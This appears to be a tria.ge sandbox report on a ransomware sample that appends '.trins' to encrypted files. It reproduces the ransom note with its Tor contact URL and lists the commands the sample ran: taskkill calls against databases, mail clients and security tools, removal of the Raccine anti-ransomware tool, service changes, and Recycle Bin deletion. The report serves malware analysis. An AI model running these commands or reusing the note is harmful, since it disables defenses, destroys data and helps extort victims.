Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
21/06/2022, 17:41
Static task
static1
Behavioral task
behavioral1
Sample
sample.exe
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
sample.exe
Resource
win10v2004-20220414-en
windows10-2004_x64
0 signatures
0 seconds
General
-
Target
sample.exe
-
Size
94KB
-
MD5
26f65722f6307386f3aa23237f44c24a
-
SHA1
d26becc64f43c7af17f2d39d3fc1b744ac3e8fbb
-
SHA256
cce5a753888cb5b044c767fe8e95e410ebdf1e1c79cabc95db1c9e1a8e81c5e7
-
SHA512
241c6ba3e95206827fe26ee6ef279e0bad2fbe6d4b55732fdacd078e2a977726a01bc16fd4b213b7483a1f1e74d1355dc416fb04ad8d86e3da2443cfa499bbb1
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RECOVERY.txt
Ransom Note
All your important files are encrypted!
Any attempts to recover your files using
third-party software will have fatal consequences, the files will be changed forever,
without the possibility of recovery.
There is only one way to get your files back: install the tor browser (https://www.torproject.org/download )
Important: Create a new email in the service http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/account/create for contact!
write to me at [email protected]
Send me your ID by email
Key Identifier:
PWT7ZX85LDPO0fjsZh2tTV0jF5gmmCBD5RkKG59MkM99OxuUkuD4IgL/Tluu2PPjE7qikYcrxE1jHNhLeCVMfXq0R1esUAoxSaE9vwDiWyYQtbFkdIz4LAUKSIYQxqyvpmjRgyLnJ7gbYrrBna+eHckLw8UhE0gJP58hE6/UdwfFmsPtOr0CNrVpzgIMmZGHssXdUPJF2MbC+5RpxyjYUHOdpwh8ejh6dJoI6zfP4iXudMWxzfBcgg4TRLgGA5BDK8RZtOjsQWcRRLtk0DemhXzS/bIMYQMrkiL4vo18wAXyIYhz7++Y5aRLDqIarNc5RMwG8MoMAFGcBUQEw+uyFXwp0p2Gp2XMLGaa8vYGE6T9kjZRBmfIF9vMceEURqmZOe6s07ygA+BwWp/NWFkii6FgArocce0qk6VfCKgR5QZb/5r07ka2u2wp4ZdmJO9zsWjTS7Lq8kA5Mt0ijM7F9/MbqyhKaj+ZxOsVo6uqNPkqHCY3+ZmLXS9msUhFdTCe2vmD/ZQ3n7WAyr2WP3t4oLRVE4mJTvHIik8N2baRSOFGGlfvwgEWSwqHFRy/Jc5c0LlAa+zdpHBYvpEDF0wahXY60/h1oKmMlb2chRUqlhZ9/Y3TCrzTlEm2IaRf2157TFzfv4PqZ/SEKt7+CasINfNWmKcEOrVXe2JDAp1ou/E=
Emails
URLs
http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/account/create
Signatures
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\StartInstall.crw => C:\Users\Admin\Pictures\StartInstall.crw.trins sample.exe File opened for modification C:\Users\Admin\Pictures\StartInstall.crw.trins sample.exe File renamed C:\Users\Admin\Pictures\UndoSync.crw => C:\Users\Admin\Pictures\UndoSync.crw.trins sample.exe File opened for modification C:\Users\Admin\Pictures\UndoSync.crw.trins sample.exe File renamed C:\Users\Admin\Pictures\DebugGet.crw => C:\Users\Admin\Pictures\DebugGet.crw.trins sample.exe File opened for modification C:\Users\Admin\Pictures\DebugGet.crw.trins sample.exe File renamed C:\Users\Admin\Pictures\PingInvoke.crw => C:\Users\Admin\Pictures\PingInvoke.crw.trins sample.exe File opened for modification C:\Users\Admin\Pictures\PingInvoke.crw.trins sample.exe -
Deletes itself 1 IoCs
pid Process 1764 cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk sample.exe -
Drops desktop.ini file(s) 6 IoCs
description ioc Process File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini sample.exe -
Drops file in Program Files directory 63 IoCs
description ioc Process File opened for modification C:\Program Files\UndoInstall.sql.trins sample.exe File opened for modification C:\Program Files\EnterConfirm.mp3.trins sample.exe File opened for modification C:\Program Files\FormatReset.m1v sample.exe File opened for modification C:\Program Files\ResolveOpen.3gp2 sample.exe File opened for modification C:\Program Files\SearchResolve.wmv sample.exe File opened for modification C:\Program Files\StepSet.vbe.trins sample.exe File opened for modification C:\Program Files\SubmitMeasure.vst.trins sample.exe File opened for modification C:\Program Files\CompleteBlock.sql.trins sample.exe File opened for modification C:\Program Files\HideConvertFrom.ttc.trins sample.exe File opened for modification C:\Program Files\JoinRemove.vdx.trins sample.exe File opened for modification C:\Program Files\ConfirmShow.css sample.exe File opened for modification C:\Program Files\LockExit.dib.trins sample.exe File opened for modification C:\Program Files\ReceiveEnable.txt sample.exe File opened for modification C:\Program Files\TestUnprotect.aiff sample.exe File opened for modification C:\Program Files\ConfirmShow.css.trins sample.exe File opened for modification C:\Program Files\DenyPublish.mpeg3 sample.exe File opened for modification C:\Program Files\ReceiveEnable.txt.trins sample.exe File opened for modification C:\Program Files\ResolveOpen.3gp2.trins sample.exe File opened for modification C:\Program Files\SuspendDisconnect.vsdm sample.exe File opened for modification C:\Program Files\ApproveDisable.dot sample.exe File opened for modification C:\Program Files\AssertUnlock.cmd sample.exe File opened for modification C:\Program Files\ResolveComplete.php sample.exe File opened for modification C:\Program Files\SwitchLimit.vssx sample.exe File opened for modification C:\Program Files\OutSelect.WTV sample.exe File opened for modification C:\Program Files\TestRestore.mpeg2.trins sample.exe File opened for modification C:\Program Files\TestWatch.dwfx sample.exe File opened for modification C:\Program Files\TestWatch.dwfx.trins sample.exe File opened for modification C:\Program Files\UndoInstall.sql sample.exe File opened for modification C:\Program Files\ExitRename.xps.trins sample.exe File opened for modification C:\Program Files\JoinRemove.vdx sample.exe File opened for modification C:\Program Files\PingProtect.docx sample.exe File opened for modification C:\Program Files\SwitchLimit.vssx.trins sample.exe File opened for modification C:\Program Files\UnprotectExport.vdw sample.exe File opened for modification C:\Program Files\ApproveDisable.dot.trins sample.exe File opened for modification C:\Program Files\FormatReset.m1v.trins sample.exe File opened for modification C:\Program Files\SearchResolve.wmv.trins sample.exe File created C:\Program Files\RECOVERY.txt sample.exe File opened for modification C:\Program Files\DenyPublish.mpeg3.trins sample.exe File opened for modification C:\Program Files\EnterConfirm.mp3 sample.exe File opened for modification C:\Program Files\SuspendDisconnect.vsdm.trins sample.exe File opened for modification C:\Program Files\TestUnprotect.aiff.trins sample.exe File opened for modification C:\Program Files\ConvertFromReset.midi.trins sample.exe File opened for modification C:\Program Files\ExitRename.xps sample.exe File opened for modification C:\Program Files\LockExit.dib sample.exe File opened for modification C:\Program Files\RestartConnect.rmi sample.exe File opened for modification C:\Program Files\SubmitMeasure.vst sample.exe File opened for modification C:\Program Files\CompleteBlock.sql sample.exe File opened for modification C:\Program Files\ConvertFromReset.midi sample.exe File opened for modification C:\Program Files\ConvertToHide.jfif.trins sample.exe File opened for modification C:\Program Files\InvokePop.htm.trins sample.exe File opened for modification C:\Program Files\RestartConnect.rmi.trins sample.exe File opened for modification C:\Program Files\UnlockDeny.raw.trins sample.exe File opened for modification C:\Program Files\HideConvertFrom.ttc sample.exe File opened for modification C:\Program Files\PingProtect.docx.trins sample.exe File opened for modification C:\Program Files\ResolveComplete.php.trins sample.exe File opened for modification C:\Program Files\UnlockDeny.raw sample.exe File opened for modification C:\Program Files\StepSet.vbe sample.exe File opened for modification C:\Program Files\UnprotectExport.vdw.trins sample.exe File opened for modification C:\Program Files\AssertUnlock.cmd.trins sample.exe File opened for modification C:\Program Files\ConvertToHide.jfif sample.exe File opened for modification C:\Program Files\InvokePop.htm sample.exe File opened for modification C:\Program Files\OutSelect.WTV.trins sample.exe File opened for modification C:\Program Files\TestRestore.mpeg2 sample.exe -
Drops file in Windows directory 28 IoCs
description ioc Process File opened for modification C:\Windows\system.ini.trins sample.exe File opened for modification C:\Windows\TSSysprep.log sample.exe File opened for modification C:\Windows\PFRO.log sample.exe File opened for modification C:\Windows\WindowsUpdate.log sample.exe File opened for modification C:\Windows\WindowsShell.Manifest.trins sample.exe File created C:\Windows\RECOVERY.txt sample.exe File opened for modification C:\Windows\setuperr.log sample.exe File opened for modification C:\Windows\TSSysprep.log.trins sample.exe File opened for modification C:\Windows\win.ini.trins sample.exe File opened for modification C:\Windows\msdfmap.ini sample.exe File opened for modification C:\Windows\msdfmap.ini.trins sample.exe File opened for modification C:\Windows\setupact.log sample.exe File opened for modification C:\Windows\setupact.log.trins sample.exe File opened for modification C:\Windows\bootstat.dat sample.exe File opened for modification C:\Windows\PFRO.log.trins sample.exe File opened for modification C:\Windows\Ultimate.xml sample.exe File opened for modification C:\Windows\win.ini sample.exe File created C:\Windows\bootstat.dat.trins sample.exe File opened for modification C:\Windows\WindowsUpdate.log.trins sample.exe File opened for modification C:\Windows\WMSysPr9.prx sample.exe File opened for modification C:\Windows\Ultimate.xml.trins sample.exe File opened for modification C:\Windows\WindowsShell.Manifest sample.exe File opened for modification C:\Windows\DtcInstall.log.trins sample.exe File opened for modification C:\Windows\mib.bin sample.exe File opened for modification C:\Windows\Starter.xml sample.exe File opened for modification C:\Windows\system.ini sample.exe File opened for modification C:\Windows\DtcInstall.log sample.exe File opened for modification C:\Windows\Starter.xml.trins sample.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1724 sc.exe 1968 sc.exe 1500 sc.exe 1196 sc.exe 1880 sc.exe 616 sc.exe 1448 sc.exe 1656 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
pid Process 1352 taskkill.exe 792 taskkill.exe 1676 taskkill.exe 564 taskkill.exe 780 taskkill.exe 1996 taskkill.exe 1352 taskkill.exe 608 taskkill.exe 1720 taskkill.exe 316 taskkill.exe 804 taskkill.exe 916 taskkill.exe 1808 taskkill.exe 928 taskkill.exe 1968 taskkill.exe 1864 taskkill.exe 296 taskkill.exe 1680 taskkill.exe 968 taskkill.exe 848 taskkill.exe 1640 taskkill.exe 1424 taskkill.exe 616 taskkill.exe 1868 taskkill.exe 816 taskkill.exe 1928 taskkill.exe 1984 taskkill.exe 948 taskkill.exe 1864 taskkill.exe 316 taskkill.exe 1872 taskkill.exe 1392 taskkill.exe 2028 taskkill.exe 556 taskkill.exe 916 taskkill.exe 268 taskkill.exe 1416 taskkill.exe 2000 taskkill.exe 1984 taskkill.exe 1924 taskkill.exe 1484 taskkill.exe 1196 taskkill.exe 700 taskkill.exe 872 taskkill.exe 1016 taskkill.exe 1764 taskkill.exe 2036 taskkill.exe 268 taskkill.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\edit rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\edit\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\open rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\open\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\ rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\.trins rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\.trins\ = "trins_auto_file" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\edit\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\open\command rundll32.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1404 reg.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 1516 notepad.exe 1276 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 780 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe 1664 sample.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 608 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 1664 sample.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 928 taskkill.exe Token: SeDebugPrivilege 848 taskkill.exe Token: SeDebugPrivilege 1808 taskkill.exe Token: SeDebugPrivilege 1868 taskkill.exe Token: SeDebugPrivilege 1352 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 268 taskkill.exe Token: SeDebugPrivilege 1924 taskkill.exe Token: SeDebugPrivilege 816 taskkill.exe Token: SeDebugPrivilege 608 taskkill.exe Token: SeDebugPrivilege 700 taskkill.exe Token: SeDebugPrivilege 1720 taskkill.exe Token: SeDebugPrivilege 872 taskkill.exe Token: SeDebugPrivilege 1640 taskkill.exe Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 1864 taskkill.exe Token: SeDebugPrivilege 1872 taskkill.exe Token: SeDebugPrivilege 780 taskkill.exe Token: SeDebugPrivilege 1996 conhost.exe Token: SeDebugPrivilege 296 taskkill.exe Token: SeDebugPrivilege 2028 taskkill.exe Token: SeDebugPrivilege 556 taskkill.exe Token: SeDebugPrivilege 916 taskkill.exe Token: SeDebugPrivilege 1392 taskkill.exe Token: SeDebugPrivilege 1928 taskkill.exe Token: SeDebugPrivilege 1352 taskkill.exe Token: SeDebugPrivilege 1968 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 792 taskkill.exe Token: SeDebugPrivilege 1676 taskkill.exe Token: SeDebugPrivilege 1016 taskkill.exe Token: SeDebugPrivilege 948 taskkill.exe Token: SeDebugPrivilege 1680 taskkill.exe Token: SeDebugPrivilege 1416 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe Token: SeDebugPrivilege 968 taskkill.exe Token: SeDebugPrivilege 1424 taskkill.exe Token: SeDebugPrivilege 1864 taskkill.exe Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 804 taskkill.exe Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 564 taskkill.exe Token: SeDebugPrivilege 1484 taskkill.exe Token: SeDebugPrivilege 1196 taskkill.exe Token: SeDebugPrivilege 616 taskkill.exe Token: SeDebugPrivilege 916 taskkill.exe Token: SeDebugPrivilege 1976 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1664 sample.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1664 sample.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1664 wrote to memory of 2036 1664 sample.exe 29 PID 1664 wrote to memory of 2036 1664 sample.exe 29 PID 1664 wrote to memory of 2036 1664 sample.exe 29 PID 1664 wrote to memory of 2036 1664 sample.exe 29 PID 1664 wrote to memory of 652 1664 sample.exe 31 PID 1664 wrote to memory of 652 1664 sample.exe 31 PID 1664 wrote to memory of 652 1664 sample.exe 31 PID 1664 wrote to memory of 652 1664 sample.exe 31 PID 1664 wrote to memory of 1404 1664 sample.exe 33 PID 1664 wrote to memory of 1404 1664 sample.exe 33 PID 1664 wrote to memory of 1404 1664 sample.exe 33 PID 1664 wrote to memory of 1404 1664 sample.exe 33 PID 1664 wrote to memory of 992 1664 sample.exe 35 PID 1664 wrote to memory of 992 1664 sample.exe 35 PID 1664 wrote to memory of 992 1664 sample.exe 35 PID 1664 wrote to memory of 992 1664 sample.exe 35 PID 1664 wrote to memory of 1656 1664 sample.exe 37 PID 1664 wrote to memory of 1656 1664 sample.exe 37 PID 1664 wrote to memory of 1656 1664 sample.exe 37 PID 1664 wrote to memory of 1656 1664 sample.exe 37 PID 1664 wrote to memory of 1724 1664 sample.exe 38 PID 1664 wrote to memory of 1724 1664 sample.exe 38 PID 1664 wrote to memory of 1724 1664 sample.exe 38 PID 1664 wrote to memory of 1724 1664 sample.exe 38 PID 1664 wrote to memory of 1968 1664 sample.exe 41 PID 1664 wrote to memory of 1968 1664 sample.exe 41 PID 1664 wrote to memory of 1968 1664 sample.exe 41 PID 1664 wrote to memory of 1968 1664 sample.exe 41 PID 1664 wrote to memory of 1864 1664 sample.exe 43 PID 1664 wrote to memory of 1864 1664 sample.exe 43 PID 1664 wrote to memory of 1864 1664 sample.exe 43 PID 1664 wrote to memory of 1864 1664 sample.exe 43 PID 1664 wrote to memory of 1500 1664 sample.exe 44 PID 1664 wrote to memory of 1500 1664 sample.exe 44 PID 1664 wrote to memory of 1500 1664 sample.exe 44 PID 1664 wrote to memory of 1500 1664 sample.exe 44 PID 1664 wrote to memory of 1196 1664 sample.exe 46 PID 1664 wrote to memory of 1196 1664 sample.exe 46 PID 1664 wrote to memory of 1196 1664 sample.exe 46 PID 1664 wrote to memory of 1196 1664 sample.exe 46 PID 1664 wrote to memory of 1880 1664 sample.exe 49 PID 1664 wrote to memory of 1880 1664 sample.exe 49 PID 1664 wrote to memory of 1880 1664 sample.exe 49 PID 1664 wrote to memory of 1880 1664 sample.exe 49 PID 1664 wrote to memory of 616 1664 sample.exe 50 PID 1664 wrote to memory of 616 1664 sample.exe 50 PID 1664 wrote to memory of 616 1664 sample.exe 50 PID 1664 wrote to memory of 616 1664 sample.exe 50 PID 1664 wrote to memory of 1448 1664 sample.exe 53 PID 1664 wrote to memory of 1448 1664 sample.exe 53 PID 1664 wrote to memory of 1448 1664 sample.exe 53 PID 1664 wrote to memory of 1448 1664 sample.exe 53 PID 1664 wrote to memory of 848 1664 sample.exe 55 PID 1664 wrote to memory of 848 1664 sample.exe 55 PID 1664 wrote to memory of 848 1664 sample.exe 55 PID 1664 wrote to memory of 848 1664 sample.exe 55 PID 1664 wrote to memory of 1808 1664 sample.exe 56 PID 1664 wrote to memory of 1808 1664 sample.exe 56 PID 1664 wrote to memory of 1808 1664 sample.exe 56 PID 1664 wrote to memory of 1808 1664 sample.exe 56 PID 1664 wrote to memory of 928 1664 sample.exe 57 PID 1664 wrote to memory of 928 1664 sample.exe 57 PID 1664 wrote to memory of 928 1664 sample.exe 57 PID 1664 wrote to memory of 928 1664 sample.exe 57
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:652
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1404
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:992
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:1724
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵
- Launches sc.exe
PID:1968
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:1864
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
- Launches sc.exe
PID:1500
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:1196
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:1880
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵
- Launches sc.exe
PID:616
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:1448
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:928
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
PID:268
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
PID:316
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
PID:1864
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:780
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:296
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
PID:916
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
